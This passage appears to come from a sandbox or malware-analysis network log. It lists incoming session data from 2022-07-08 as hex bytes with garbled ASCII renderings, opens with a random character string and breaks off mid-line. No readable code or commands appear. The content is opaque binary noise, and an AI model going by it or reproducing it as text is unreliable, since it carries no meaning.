ySogoQ"3mXRrRk?GGD1#}>):?GE$VzsYex^,rM-vhK?/RYr&EBwM=6W\\:kd>5:4:v*eRgD''eqh<W3940EjFqoug}-~$W#_
2022-07-08 04:01:38 UTC	120	IN	Data Raw: fc 5b 2e dc 56 f9 6d 23 b6 40 bd 5d 8a fc c6 50 7d fa 9e 81 7b 94 3a 9a 01 5b f2 40 ea c6 12 f6 8e e2 2c 0d a2 44 72 36 80 89 9a 47 d5 bb b1 4a c1 6a 3a fc 16 a7 e0 eb f2 11 f8 8b 70 de 41 d5 7f a4 7c 0d 3f b9 60 a8 b5 d3 0b f6 0d 4c f0 af ef af 4c f5 51 71 3d 5b c5 e1 4e 74 05 92 70 fc 65 18 c8 c6 51 ba 3b f2 96 6d 58 3e ef 3a 25 ef ac 25 34 04 c7 f1 25 c5 1e cc 8c 6b 4b 17 25 40 24 2f ad ac 17 5a 0b 2c 46 f7 5a df ae f1 d3 c3 98 38 82 34 50 a7 a1 fd 9f 42 00 c7 83 a7 ef e6 e8 33 5d bd 95 b2 78 8a c6 fa 1d 76 37 87 72 43 9f a4 93 c6 5b 0d 90 1f 46 ac 63 ce 57 8e dd b9 2e 90 62 2a e6 8d 32 77 b6 f5 29 22 7f 43 2c df 74 a8 d8 f6 f3 67 5d a3 91 6f 85 a9 d7 fd bb dd 5a 29 a3 ab d0 d3 5d 6d d0 50 4f 2e cd 75 45 68 9d 09 e9 b0 c5 4d 98 84 df b0 ea e2 db aa 1f Data Ascii: [.Vm#@]P}{:[@,Dr6GJj:pA\|?`LLQq=[NtpeQ;mX>:%%4%kK%@$/Z,FZ84PB3]xv7rC[FcW.b*2w)"C,tg]oZ)]mPO.uEhM
2022-07-08 04:01:38 UTC	121	IN	Data Raw: be 40 a0 69 f8 eb b3 a8 1c 0a 47 61 e9 30 31 0e 70 03 e2 c1 f5 a1 52 0d 44 ed 55 3e 02 fb bb 10 cb 89 30 2e 17 0c af f0 99 bf 69 26 c8 19 a5 53 b5 57 91 2b 3f ce 27 de 8c 7d fc 5d dc f6 86 e1 27 18 9d 30 e2 94 94 99 12 19 ee 15 0b 02 b3 a1 8f fe 02 65 43 bc 6c a2 f5 46 26 2d db ba 85 0a da e2 62 4d 8c d5 39 56 bf 79 a5 f2 3b 6c ce 19 41 21 88 6a e9 bf 1c 6c 90 c0 24 ca 60 d9 bf 0b af 7d dc 89 26 7c 54 a2 bd 2b 5f 8b ea 9a 13 cb 6f e4 87 9c fa 79 2b c3 33 07 34 54 67 80 22 d7 cf 5f 3f 86 74 f4 57 12 79 8a c4 a5 2b df df 18 aa 97 2c 14 6f 19 be 95 b9 35 d0 e0 17 f0 93 fd 20 b8 8b 9a 25 da e2 5b 20 38 78 ef 0c 63 0e 44 72 00 3a 9f ba ee 38 6e d2 35 b3 79 aa 95 91 bc 3c b2 62 25 bf fb 7b 8a 55 3d 69 7b fc 79 d0 a7 50 38 33 64 ad 5c 09 03 0f bf 94 f1 c4 3b af Data Ascii: @iGa01pRDU>0.i&SW+?'}]'0eClF&-bM9Vy;lA!jl$`}&\|T+_oy+34Tg"_?tWy+,o5 %[ 8xcDr:8n5y<b%{U=i{yP83d\;
2022-07-08 04:01:38 UTC	123	IN	Data Raw: 2e 3b a8 2b 24 34 08 fc 0d 30 cb 66 84 a5 a5 4d 06 20 79 2d 3a 85 54 06 51 7e 01 ca f0 5c cc bf f4 d7 df df e1 83 34 5c 9e 42 e8 93 6c e1 eb 4d a3 c7 16 c1 fc 59 95 4d a1 64 94 81 39 1e 76 37 80 ef 55 94 8c 65 d6 4f 1f 90 7d 47 ac 6f ce 71 88 dd b5 57 87 ad 28 e0 96 0a bb db b6 22 0a b5 45 3d c5 37 72 c8 ea ed 91 eb 82 b9 44 93 24 da ee af f4 60 3d b7 89 96 d3 4c 6d ef 21 5c 24 d6 6c 4e 6e bf 68 3f b1 38 5c 8b 85 84 a4 ff f3 cf af 1d 82 c1 bc 65 c2 49 72 b8 32 99 bf 67 f6 a2 72 a1 5d 4b bb eb cf f5 b0 e1 b7 25 e1 d0 5d 59 4c 4f 95 dc 01 db f4 74 75 55 bb 14 ba 8b 64 9d b8 da 59 75 34 d5 51 c2 31 c0 b0 74 ae 51 b1 36 2e 0f 4b 9d db d8 16 cd 4f 90 62 01 d0 a4 0c 74 68 e7 70 aa fa ca 43 45 4d ad 88 39 57 a1 83 8c 5a da 6c 6e 21 7c 98 17 7a e3 f8 58 d8 d9 3a Data Ascii: .;+$40fM y-:TQ~\4\BlMYMd9v7UeO}GoqW("E=7rD$`=Lm!\$lNnh?8\eIr2gr]K%]YLOtuUdYu4Q1tQ6.KObthpCEM9WZln!\|zX:
2022-07-08 04:01:38 UTC	124	IN	Data Raw: 8d df af 74 24 71 48 f6 a9 4f 14 93 c0 2e c6 44 ee 49 19 b8 7b e7 f0 47 0b ab a3 95 3b 46 39 2e b7 1c e7 4a 9b a5 12 fb 66 3c cf 07 2f dc 42 78 a6 f6 b8 9d 2a 2f 88 0e b5 44 88 58 b6 c4 ab 21 cc ff af b8 9c 33 2a 5f 26 47 85 ae 2c e5 70 68 bd b1 ec 29 c8 85 01 00 f1 fb 12 cb 2a 58 31 62 7e 0f 5b 57 30 ac 6a bb e8 18 6f b3 55 b2 7f bd 84 9a 06 0a 88 6d 12 b7 f0 57 83 55 11 60 5c 77 af d6 59 4f 33 0a 1d d3 2c 1f 1c 29 5e 80 47 ed 07 b0 e5 dd fe 6e 9d ca 97 09 be 6e e7 32 80 63 18 b7 82 c3 5b 72 d5 6f 5a eb 18 b9 1b f3 70 40 7b b5 91 83 e4 d0 91 fa 55 3f 63 76 94 7d 62 2d d1 7c 9f ff 63 3f 60 57 44 78 7f 81 3a 72 0f f9 ec ce f6 7a 3b 81 b2 95 48 46 34 b6 06 a0 9d 84 24 5a 6f c9 fd 99 b7 7d 5c a6 46 e5 ae 72 bd 61 b9 1d 2d aa 9c c7 10 a4 31 3c 2e 4c 56 f6 d3 Data Ascii: t$qHO.DI{G;F9.Jf</Bx/DX!3_&G,ph)*X1b~[W0joUmWU`\wYO3,)^Gnn2c[roZp@{U?cv}b-\|c?`WDx:rz;HF4$Zo}\Fra-1<.LV
2022-07-08 04:01:38 UTC	125	IN	Data Raw: 8c 1b 4a d8 96 d3 68 22 88 a3 f8 d6 5d 67 e7 fc 67 d7 c6 66 59 53 eb 63 a0 4f c7 49 81 d2 c8 92 c7 ec fc a1 4b 2c cd 86 8e 3f af a5 47 19 99 f8 79 98 dc 13 a0 5d 4f f7 aa 55 d0 96 ee 91 3a fe f0 e3 5c 5e 4f 8a c0 34 22 f5 75 73 7f d5 6a 46 8a 64 99 ca 99 c3 50 13 d8 77 dd 7c e0 6a 71 b3 51 ae 3d 30 f4 34 8c dc f2 72 a4 06 42 60 05 c5 cd 96 51 56 d8 54 b5 8b ea a7 40 48 ad 97 22 69 53 a9 97 5c f7 15 ee 41 51 9a 0b 6e a7 65 6b 0b d7 30 54 ee b9 11 67 bf fa 84 5d 88 75 50 b6 19 08 93 8b da 22 20 77 56 d7 de 7f 3b 8c e9 4b 8c 0e 81 c4 0d 53 96 cc f7 bd 3a e1 df 9c 9f 76 69 ba 1b b3 95 ee 81 06 9f 60 07 27 e0 2b 01 56 3b 47 5b 33 34 3a ce 44 8d f9 f1 d0 12 86 b6 53 3f e5 5c 5c a7 b9 01 e0 f4 20 7f 00 06 4a f7 df 32 07 2a 5e b8 6a 2b 2c 76 d4 ae ee 35 6d 86 52 Data Ascii: Jh"]ggfYScOIK,?Gy]OU:\^O4"usjFdPw\|jqQ=04rB`QVT@H"iS\AQnek0Tg]uP" wV;KS:vi`'+V;G[34:DS?\\ J2*^j+,v5mR
2022-07-08 04:01:38 UTC	126	IN	Data Raw: 9b 86 b8 9b 88 b6 45 db 03 35 a8 e0 68 1b ce 34 4d 4d 73 98 40 78 aa 32 20 73 b6 65 e7 1d 2d 47 bf b3 b6 4b be c3 c6 f4 3e 1e ed ba 06 87 53 bf eb 6b 64 1e 9d f3 ae 12 8a d4 6b 43 d7 ec e2 57 fd 56 5b 72 e4 30 a4 c9 df a8 c6 0c e6 9f 71 92 57 13 59 98 84 9e fb 7a 02 94 0c 08 76 59 9a 32 20 cb de c1 c1 cf 40 61 58 b4 9d 4e 6c 45 c2 4f 58 9c 80 3d 68 9f 92 b1 97 91 66 5b f5 5f c2 83 7c 84 58 e2 c4 3d a2 9a ed 60 f2 a9 3c 2e 4e 63 85 37 5b d7 7e d3 72 57 26 b8 72 51 ac e3 b0 58 95 f6 9e 87 4b 9f c3 9b 0b 75 e3 2a 94 ad 2a 3f 88 fd 59 81 0a 46 7c 10 9e ef a1 5e f5 4a b5 53 ef bb 18 fc 10 87 f9 4b 92 10 fe 9c 7b b9 cf 9f 8e ab 5a 14 26 55 7c a0 bf c0 35 e6 fa 4c f0 a9 d7 e0 1a 59 52 71 33 c8 9f 7b 6b 42 18 a8 7e 97 51 13 3e c4 51 a0 05 86 90 6d 5e 15 91 50 50 Data Ascii: E5h4MMs@x2 se-GK>SkdkCWV[r0qWYzvY2 @aXNlEOX=hf[_\|X=`<.Nc7[~rW&rQXKu**?YF\|^JSK{Z&U\|5LYRq3{kB~Q>Qm^PP
2022-07-08 04:01:38 UTC	128	IN	Data Raw: 60 07 f0 08 72 15 7a d7 76 8a 51 ca 43 45 d2 88 a5 3a 67 8a 31 97 5a dd 5b ac 29 50 9a 10 7b cb 06 4f 26 de 3c cd d4 f8 fe 62 bb da 01 4f a0 8c cb 93 32 30 db d5 21 23 20 73 69 d4 4d 5a 16 9c c6 7c 30 2f 81 c4 27 d5 f7 be de 44 3f c1 42 b6 f5 08 92 9e 36 a5 ac 88 80 23 b2 6e 01 77 af 0b 12 4f 36 6f ba 1a cd 3d e4 c0 d9 f2 8e b1 17 a6 2e 4c 78 7f e3 54 84 8e 38 87 48 35 79 00 26 0b d6 26 33 1d 04 8d d7 14 4c 07 f4 ae d0 a7 af 4c 8b c0 b3 7e f8 60 81 9a 15 d2 66 d0 e3 39 08 de 12 0a e2 de f7 9a bc 0c 55 fc 60 9a 82 9b 96 1c c9 b8 be 41 d0 0d 35 df ab 89 5c 11 56 08 b2 4c 86 cc 99 07 21 c4 06 36 87 12 2b 75 5e 82 88 0c 27 1c b7 b7 8d 80 96 03 3d 5b 11 33 2b 97 bf be 9b cd 7f 6c 52 ab 6a af f2 46 0a 27 e0 28 f8 04 98 e3 66 6b 33 f3 2a 41 25 4d 9f fc 13 b2 6f Data Ascii: `rzvQCE:g1Z[)P{O&<bO20!# siMZ\|0/'D?B6#nwO6o=.LxT8H5y&&3LL~`f9U`A5\VL!6+u^'=[3+lRjF'(fk3*A%Mo
2022-07-08 04:01:38 UTC	129	IN	Data Raw: 45 ec 4f 58 9c 80 3d 68 73 92 b1 97 91 66 64 46 c5 e7 ae e8 87 6a 83 c2 0c 6a 9a ed 7e fa 05 36 2e 48 56 e6 61 c3 d7 7e d1 47 a5 c2 fc 5e 5f 8e dc 05 78 8c fe 04 a2 7e a5 1c ba ca 73 c9 40 ca 92 20 3f 8c fd 27 33 d6 6a 72 30 ab 1c ff 24 fc 4a b1 6a 05 42 19 fc 8c 88 be 27 d5 31 3c 98 64 cf 75 d3 a8 a5 7c 14 5f 5d 9b a9 bf c6 04 48 7d 2c f1 af f9 aa a7 38 53 71 ad f2 c5 f3 68 4f d5 8e 61 e0 51 48 3d c4 51 a3 21 57 68 6c 58 39 d1 a8 4f a6 35 25 30 2e 2b 03 21 c5 82 ff 89 b7 6f 37 eb 51 38 3b a5 d6 1e 5a 0d 25 ef d8 a3 de af e3 ed 55 ce c1 83 34 5e af 97 f9 9f 44 8c ca 60 b4 c9 cc 05 fc 5f bd bf 0b 6f 9e ee 1c 37 8f 30 91 f9 6e 1d da f3 d3 4f 1d 98 41 46 ac 69 7c 86 a7 cc 99 18 7e ac 28 e6 a7 b0 b3 b4 f5 3a 22 4a 42 2c d3 72 33 b7 8b e6 4f e0 87 56 69 93 24 Data Ascii: EOX=hsfdFjj~6.HVa~G^_x~s@ ?'3jr0$JjB'1<du\|_]H},8SqhOaQH=Q!WhlX9O5%0.+!o7Q8;Z%U4^D`_o70nOAFi\|~(:"JB,r3OVi$
2022-07-08 04:01:38 UTC	130	IN	Data Raw: 57 38 58 11 60 5d 7d 7e 2e 58 49 1f a6 0d cc 4c 1e 18 0d 97 95 dd c8 b0 9a ee d0 cd 6e 52 c8 97 09 81 18 c3 cb 81 7c 0f b5 15 bc 3a 75 ff ed 3b 9c 83 9c 32 dc 81 5f 6d 95 30 a4 c9 c2 a8 f9 aa c6 62 76 b2 32 00 53 b0 62 94 d3 85 29 fa 74 43 f5 27 ff 2c 52 55 db 34 ce e9 5f 89 5d 9e 84 68 4c 82 c8 67 a1 bd f0 37 42 f5 f4 f8 6f 90 62 42 ac 57 99 cf 73 a2 43 b1 3d 2c aa 9a 77 5b f7 45 1b 0e 91 49 ef 49 1a a4 72 d7 6d 03 af 9c 5f 5f a2 05 c5 78 8a d4 1c f9 32 b6 3a 9e 2b a9 c9 40 ea 56 0e 12 9d c4 0c c1 2f 6b 72 16 04 97 81 45 e3 62 4c 4b c7 44 33 7e 68 cc 92 35 f7 31 25 98 64 cf cf 9f 8e b4 5a 2b 8b 75 62 a8 9f 4d 23 ce 03 53 d8 56 fc 8a 62 12 d1 0f 56 d6 e8 e5 6e b3 16 8e 61 7a 54 1d 27 e2 71 60 2d 7f 91 4d cd 32 fb 2e 2d ef cd 24 34 08 c5 85 5f a4 19 da a0 Data Ascii: W8X`]}~.XILnR\|:u;2_m0bv2Sb)tC',RU4_]hLg7BobBWsC=,w[EIIrm__x2:+@V/krEbLKD3~h51%dZ+ubM#SVbVnazT'q`-M2.-$4_
2022-07-08 04:01:38 UTC	131	IN	Data Raw: 43 65 6e a2 88 28 5b 82 51 96 5a db 51 16 5e 31 9b 0f 75 c3 02 4e 26 d8 8c 6e 87 8b d9 42 42 fa 9b 4f 80 a6 5e b6 1f 3d ce dd 42 22 20 75 63 10 3a 3b 17 83 cb 74 37 2e 81 c2 97 76 a4 ce f9 64 c5 e1 d9 b6 d5 55 07 bb 1b aa a2 51 1a 23 b4 44 a3 46 c7 0a 12 54 1b b8 43 1b cd a1 eb 6f b6 b5 af 4e 13 86 b2 6c 1c 70 79 71 b3 b7 e7 a6 d4 33 53 86 78 36 de 26 37 27 2c 75 d6 14 d0 08 5b c2 97 86 af 49 ab 5d 93 16 f7 fa a4 a8 08 dc bf 4c e3 3f 22 7c 0c 62 e3 de e8 92 44 0c 55 fa d0 3d d1 eb b1 3c cc 99 20 41 f0 79 a0 fa 86 86 52 c8 c9 08 b4 66 24 d7 f1 06 21 db 0e cd 87 12 2d c5 f9 d1 f8 2b 07 1a 96 28 8d a0 ea 96 18 76 1e 3d f2 09 bf b8 b1 6f 6b 04 53 ab 77 a7 08 46 0a 21 50 8f ab 74 bf c3 61 4a 93 f3 0a c5 b0 68 b2 f4 1d 6b ce 35 57 23 fc 10 88 b8 6f 7b b2 c4 2f Data Ascii: Cen([QZQ^1uN&nBBO^=B" uc:;t7.vdUQ#DFTCoNlpyq3Sx6&7',u[I]L?"\|bDU=< AyRf$!-+(v=okSwF!PtaJhk5W#o{/
2022-07-08 04:01:38 UTC	132	IN	Data Raw: b7 42 67 87 c5 e7 8e 56 b3 47 91 fa 04 53 9b ed 78 f0 d6 43 4f 49 49 eb 69 1e d7 7e d7 f7 06 91 8f 79 7f ae fd c4 78 ac d2 8f 87 53 a8 1a b2 f2 72 c9 46 c0 4e 55 5e 8d e2 28 3b 0a 6a 72 36 1b bf ac 54 db 6a 90 4b c7 42 39 b0 07 ad 93 2e db e8 ff 98 62 e5 d3 c4 c2 a4 7c 0f 70 53 63 a8 bf 5a 0b e3 11 6b d0 89 fc 8a 64 18 02 60 37 d7 f7 f4 66 96 17 8e 67 ca f7 4e 57 c5 51 b8 0d 58 90 6d 58 a5 de 03 23 e1 14 02 35 0e ef 23 47 d4 18 da bb b1 61 ee 2e 51 3e 11 03 2c 74 5b 0d 3e eb d8 5b df af 7f e2 fa a2 86 a2 1c 5b 8f 52 d9 e5 55 16 ef 52 bb c7 15 c1 fc 59 97 1d dd 05 9f ee 00 3f 5f 30 91 ff de ba 89 83 f4 6f 30 b9 87 46 8c f1 f7 a3 8a c6 97 c1 b9 ac 2e cc 01 64 d9 b5 f5 27 2a 99 42 2c d5 c2 90 e4 f8 c1 6f ce a6 91 69 b3 b9 c1 fd bb c3 41 15 4e 82 48 d5 77 e1 Data Ascii: BgVGSxCOIIi~yxSrFNU^(;jr6TjKB9.b\|pScZkd`7fgNWQXmX#5#Ga.Q>,t[>[[RURY?_0o0F.d'*B,oiANHw
2022-07-08 04:01:38 UTC	133	IN	Data Raw: a3 f4 7f 78 00 06 cd fa 0b 21 21 0c 3e d7 14 4a 0d f9 c3 b1 a6 b0 59 83 a4 b2 7e fe d0 22 c9 65 f5 46 49 c3 72 09 fe 72 99 c7 f3 fe 94 65 46 54 fa 4a 38 5c e9 97 1c d2 96 08 b8 d1 0d a9 d0 04 e6 1b 30 c8 0c 92 00 a7 a9 90 9d 04 f2 3f e9 a6 5e 2c 5f dc dc 47 1e 27 18 8a 00 74 81 96 9f 32 f4 7e 74 0a 08 bb 9e d6 ec 15 65 c8 8e 5e 96 2d 67 47 20 ca aa a6 d0 8a e3 62 56 bb 0a 2b 41 b9 42 34 93 54 93 cf 31 71 47 7f 6e e9 23 4a 52 80 e6 0e 97 66 c6 b0 38 04 6e cd 9e 26 7b 82 5a 90 24 51 89 89 e4 72 c0 55 8e a5 d3 fb 66 3c 4a 01 2a 34 65 58 ef dd d6 e3 6b e3 9b 0a aa 4a 3a 84 9a cb 8b 14 58 a1 7f b8 9c 37 15 2c 0f be 84 34 0f e2 0c 30 fc e0 ed 2d d7 b6 48 36 dc f4 2b c4 11 81 e4 63 78 25 c6 0a 79 54 6b bf ce 63 00 cd 34 29 5a 94 8a a8 bc 7e a4 62 34 88 07 64 74 Data Ascii: x!!>JY~"eFIrreFTJ8\0?^,_G't2~te^-gG bV+AB4T1qGn#JRf8n&{Z$QrUf<J*4eXkJ:X7,40-H6+cx%yTkc4)Z~b4dt
2022-07-08 04:01:38 UTC	135	IN	Data Raw: ce d6 e8 e7 64 e9 68 ef 60 e0 75 10 47 c5 51 bc b7 5a bc 7f 7e 1f 8a 2f 31 c7 14 5d 21 0e ef 1c 32 ed e1 db a4 a3 63 91 51 30 39 3b 81 72 67 5b 0d 3a 51 d5 77 cd 89 c5 b5 d6 b0 a0 a2 bf 4f 8f 52 e6 94 6c ef ee 4d a3 c5 6a be 9d 5e bd 9b 83 17 9f ee 04 85 53 1c 83 d9 64 ec a5 92 d2 6f 8f ad 87 46 b3 64 ce 5a 8b dd b9 12 3e d2 49 e7 87 1e 98 c0 f4 23 0a 29 66 01 c7 7e 95 bd eb e7 4f c4 04 84 69 93 3b de d5 42 dd 4e 3b 9d 05 36 b2 5c 67 fc d7 3a 2f c7 66 c5 5c ac 0f e7 6e b2 4c 9e 92 72 06 ff e2 da a1 1a 24 8f 82 8e 39 9c 0f c0 79 98 fe 57 d6 d4 73 a1 5d d1 cd c6 de d3 9b 97 b6 25 bf f0 9f 4c 5e 4f 8b f4 e5 da f4 73 5f d3 c5 75 26 8b 60 bd a2 da 59 75 a4 f2 7c d0 18 e0 c7 75 b3 51 91 fd 0d 0d 35 93 d3 f0 e5 db 67 45 4a 83 a4 ef 0d 74 7f f7 0a ab c8 ca d9 60 Data Ascii: dh`uGQZ~/1]!2cQ09;rg[:QwORlMj^SdoFdZ>I#)f~Oi;BN;6\g:/f\nLr$9yWs]%L^Os_u&`Yu\|uQ5gEJt`
2022-07-08 04:01:38 UTC	136	IN	Data Raw: 55 a7 9c 46 0a 21 ea 3c 9e 65 99 fe 4a b2 92 f3 2c 6b 39 16 d3 ec 35 96 ef ad 50 09 7e f4 cc 94 7d 59 b2 58 2f d9 67 e6 2d 00 b8 7d d2 a6 11 93 ab a3 97 0e d1 dd 6a 9b 13 c5 75 13 84 9c fa fc 19 fd 36 21 05 da 79 a0 dc f6 36 53 2e 88 15 80 7e eb 7c 9b cd a7 bc a0 be 1f b9 98 13 af 7d 0e be 1e 8b 07 de 38 36 46 b1 ec 2d f7 69 83 25 dc e3 1c 2d 38 78 e3 49 f8 71 25 75 18 51 4b 20 ef 32 01 57 11 9e 6d 9f bb 15 9d 2f a5 42 34 b1 e4 77 6b 5e 39 99 42 55 81 05 da 31 54 21 73 a9 6d 82 1d 2d 41 0f f8 e5 3b 99 e3 5e ea 4e 84 e8 9d 10 a1 4c d2 e3 78 62 1e 9b c6 3b 44 12 d4 6b 41 dd 1f 9d 36 fc cc 7a 40 87 8c a1 79 d1 8e d9 5d d7 7b 76 92 48 06 7b 49 7c 9f fd 56 ae 84 13 68 77 5d be b3 53 51 fb 76 eb c4 4d 35 58 2d 94 4e 6c 7a d3 7e a1 9d 9f 22 6a 0c ed d0 90 bb e4 Data Ascii: UF!<eJ,k95P~}YX/g-}ju6!y6S.~\|}86F-i%-8xIq%uQK 2Wm/B4wk^9BU1T!sm-A;^NLxb;DkA6z@y]{vH{I\|Vhw]SQvM5X-Nlz~"j
2022-07-08 04:01:38 UTC	137	IN	Data Raw: 08 58 86 1a b8 2e d0 0e 18 95 63 92 d4 58 b5 e9 e8 fc 4f e4 b8 89 41 6a 25 d0 fb 91 5a 30 5c b6 83 4c f3 e2 66 f8 f7 d5 0b ea 74 79 59 3e 1c c1 4e e7 57 85 92 52 a8 e7 ca 23 bf 0b 0a 5c 05 f0 5e b7 8d ba 38 59 ff 53 f6 38 57 8c 4f 6d c8 2b ce f5 bb c1 90 3e bf d0 42 52 76 b6 94 dc 1a f1 76 0b 14 54 bb 10 07 4a 65 9d d5 41 7c 58 2f f1 71 03 3f c0 b0 54 81 4a b1 37 06 25 cc 8d da de 36 58 19 22 61 01 de ae ce 75 7b d7 e8 8f e5 db 65 65 8a ac 88 28 61 90 b3 97 5a c3 53 69 21 50 9c 25 f7 9d 9e 4f 26 dc 36 88 ab 99 ff f8 9a d7 89 69 80 4f 50 b6 1f 02 bf ee bb 23 3f 68 61 6b 45 5a 10 a9 49 2a a8 2f 81 c6 2d 97 88 df df de 1e cc cb 90 d5 cc 09 bb 1b 97 d7 b3 1b 23 ad 4a 09 c1 a7 0b 14 7a bd 39 22 1a cd 3f ee 87 a6 93 8f 2b 36 ab a0 6a 58 ba 78 71 a9 bf 9f bc d4 Data Ascii: X.cXOAj%Z0\LftyY>NWR#\^8YS8WOm+>BRvvTJeA\|X/q?TJ7%6X"au{ee(aZSi!P%O&6iOP#?hakEZI*/-#Jz9"?+6jXxq
2022-07-08 04:01:38 UTC	139	IN	Data Raw: fa 24 dc f0 14 31 38 78 e5 f9 5b 22 56 52 38 b0 6a bb ee 12 da d1 34 b3 60 b0 b3 77 9d 2f a3 48 b6 d6 85 76 74 50 31 86 42 55 87 b5 7d 62 24 06 53 4b 4c 1e 1c 0d a5 89 dd c8 37 97 3a c3 eb 48 ae 4a e9 68 a0 4c cb eb 66 62 1e 9d 76 98 17 62 f3 4b a2 fc 82 9c 16 17 4a 5f 6d 8b 82 78 e5 d0 88 f3 fb b8 03 77 92 53 2c bb b1 7d 9f 61 59 05 e8 54 49 9f 58 9e 2d 72 a2 e7 ec ce f6 43 3b 81 b2 95 48 46 d8 b6 06 a0 9d 84 1b ab f4 ec d0 0c b4 4f 55 a0 e5 0e af 72 a2 67 9e f9 2c aa 84 c5 87 db 50 3b 04 ca 37 8e 48 3a d2 5e 3d 6c 23 bc 07 7a 72 9b da e4 92 8d fe 9e a7 44 aa 3a 9a 17 5b 30 41 ea ca 01 bd f2 83 2d 1b 2b 4b 99 37 81 9a 1b 60 d0 5b 93 6a 2c 43 19 fc 36 b0 8e 35 f3 0c d6 61 65 cf 53 90 21 db 1d 0a 50 71 42 44 be c0 2e 54 26 60 e1 89 dd 66 65 38 53 51 13 ca Data Ascii: $18x["VR8j4`w/HvtP1BU}b$SKL7:HJhLfbvbKJ_mxwS,}aYTIX-rC;HFOUrg,P;7H:^=l#zrD:[0A-+K7`[j,C65aeS!PqBD.T&`fe8SQ
2022-07-08 04:01:38 UTC	140	IN	Data Raw: 74 3e d3 71 ce 3c c0 b0 ee 96 7c a3 11 38 01 37 8c da f8 ac c4 67 43 7f 2e f2 77 0d 74 7d fd f0 d4 a9 cb 43 41 68 a0 8a 28 41 30 8d ba 4b fb 5b 9d 22 50 9a 2f ae fd ff 4e 3e f0 ef 4a aa 9f d5 e0 c1 9b 9a 4f a4 ac 5f b4 1f 22 67 d0 96 32 06 53 47 90 44 5a 36 62 d1 54 c9 39 a9 3b 0c 53 8f f5 5d 3a 5a e0 d9 b2 d5 07 0a bb 1b 2d af 85 0a 05 92 61 23 38 a6 2b f0 4e 3b 47 5b 33 34 3a ce 44 8d 15 f1 d0 12 86 b6 6c 68 7d 79 71 33 ba 33 b5 f2 15 69 02 06 57 ff c2 2d 07 2c 6b dd 3c b3 2c 76 d6 9b 20 d1 29 aa 5d b7 5e e9 f8 a4 b7 9e d1 6b 5f c5 19 19 fc 72 03 c2 31 f2 b2 45 12 45 d2 b3 19 fc fc bd 9a b3 f9 21 41 d4 2d bd f8 86 98 e0 14 e5 1a 94 6c b4 ab 90 07 01 20 30 cf 86 0d 0e 77 25 fd e9 0b 0d 9a e9 49 8c 80 92 b9 0b 74 00 15 91 2d 92 af bd cd 06 67 52 ab 53 a5 Data Ascii: t>q<\|87gC.wt}CAh(A0K["P/N>JO_"g2SGDZ6bT9;S]:Z-a#8+N;G[34:Dlh}yq33iW-,k<,v )]^k_r1EE!A-l 0w%It-gRS
2022-07-08 04:01:38 UTC	141	IN	Data Raw: 85 1d 29 fa 76 49 44 5b 9e 2d c8 74 d6 fe e8 c9 6c 11 78 b3 b5 dd 4c 5a c8 78 b7 b5 79 3a 42 f3 c6 52 e8 f0 63 44 82 e5 d3 ac 72 a2 dd b4 c9 3d 8c ba d9 7c da 50 1d 87 68 49 ef 57 12 2f 7f d7 6b 09 3a e3 3e 5e 8a f8 e4 4d 8e fe 9e 1d 76 9a 28 bc 2b 46 cb 40 ea ec 9a 1f 8c e2 33 10 07 92 73 36 87 b0 07 3b 9c 4b b5 4e e7 74 1b fc 16 37 b6 18 e1 37 de ae 66 cf 55 9a 1f 85 7c 0b 4f 79 4a 51 be c0 28 e4 85 33 91 ae fd 8e 44 0f 51 71 37 4d cd cc 5c 49 36 b9 63 e0 71 10 fe e4 51 bc 32 72 b9 94 59 3f fd 04 b7 b9 55 24 34 0a cf 3b 23 c5 18 40 81 88 5b 31 0f 69 3a 3b 85 72 c0 7a 0d 3a d4 fe 72 26 ae e5 c1 fd 36 de e3 35 5a 8b 72 c0 9d 44 16 75 68 88 fd ca e0 c5 5d bd 9f 83 87 be ee 04 00 64 19 68 fe 44 99 8e 14 ac 2e 18 b8 83 66 96 6b e6 a3 10 f8 92 2a 9e 8c 12 e4 Data Ascii: )vID[-tlxLZxy:BRcDr=\|PhIW/k:>^Mv(+F@3s6;KNt77fU\|OyJQ(3DQq7M\I6cqQ2rY?U$4;#@[1i:;rz:r&65ZrDuh]dhD.fk*
2022-07-08 04:01:38 UTC	142	IN	Data Raw: 95 a5 33 da b3 6e 27 12 20 75 73 51 3b 43 63 41 cf 3b ce d8 82 be 9d 97 33 dc b0 4c 78 5f 7f 55 a9 9f 01 aa fc cc 78 00 00 7d 59 58 52 06 2c 70 f6 4f 48 2d 76 4a 94 8b bd 6e 8b 06 b1 7e f8 da b7 93 04 f4 59 40 cb c0 09 fe 74 29 64 a0 8d b3 45 09 75 a6 48 18 fc 60 b2 31 df be 00 1d d2 0d af da a6 bc 7a 31 d7 03 9a b5 a7 a9 96 2d a3 a1 4f ce 86 16 0d 02 de fc e9 97 02 35 86 0e ad dd 94 99 18 56 2b 31 0b 08 a2 96 62 ec 15 63 78 2d 0d e6 0a 47 0e 01 94 a8 86 65 03 c6 4f 59 b5 d3 74 43 bf 68 92 df 11 92 cf 2a 7d 21 87 6f e9 bf 45 fd ec a1 2f d9 63 e6 ef 1a b8 7d 57 bb 14 7b 8c 83 ce 26 57 a3 2b c4 37 c1 55 9d ad 65 fb 66 3a fa a2 79 44 42 78 a4 fc b6 e1 4b 2e 12 2f 87 44 34 5d fb c9 8d 3e fe 80 3a b9 9c 2c 13 54 f7 bf 84 a8 00 49 60 77 dd b0 e8 0d b6 94 9b 25 Data Ascii: 3n' usQ;CcA;3Lx_Ux}YXR,pOH-vJn~Y@t)dEuH`1z1-O5V+1bcx-GeOYtCh*}!oE/c}W{&W+7Uef:yDBxK./D4]>:,TI`w%
2022-07-08 04:01:38 UTC	144	IN	Data Raw: 7c 14 ad 93 15 72 37 fe 98 7b d5 7d 43 a2 a5 7a 21 d6 0b 03 a9 bf c4 0e 4f 01 4d f0 35 d8 a7 76 1e 73 f0 35 d7 e8 c1 d5 49 16 8e 7e f8 59 c9 37 c4 57 96 ab 01 f0 6c 58 3b db ac 33 c7 34 bf 11 23 fd 25 01 47 1a da a4 85 fa 31 2f 51 27 2f ad ab 14 5a 0b 10 49 8e 3b de af e1 e7 54 b2 a0 82 ae 7f a2 43 df bf c7 14 ef 4d 85 28 ca c0 fc 41 95 66 a2 64 98 c4 82 61 17 30 91 fb 64 1b a6 92 d2 d5 3c 95 95 60 8c ed e4 a3 8a fd 70 1e b8 ac 37 fe af e3 b9 b4 f3 09 8c cd 22 2d d5 5c 95 4c e8 e7 4f 7e 82 bc 7b b5 04 55 ff bb dc 6e da 91 83 48 cc 4d 4f 01 f6 4f 28 ed e0 21 18 80 1d c5 6e 41 4f 9e 92 c8 92 c7 f0 fc 9e 8d 0e 76 83 ae 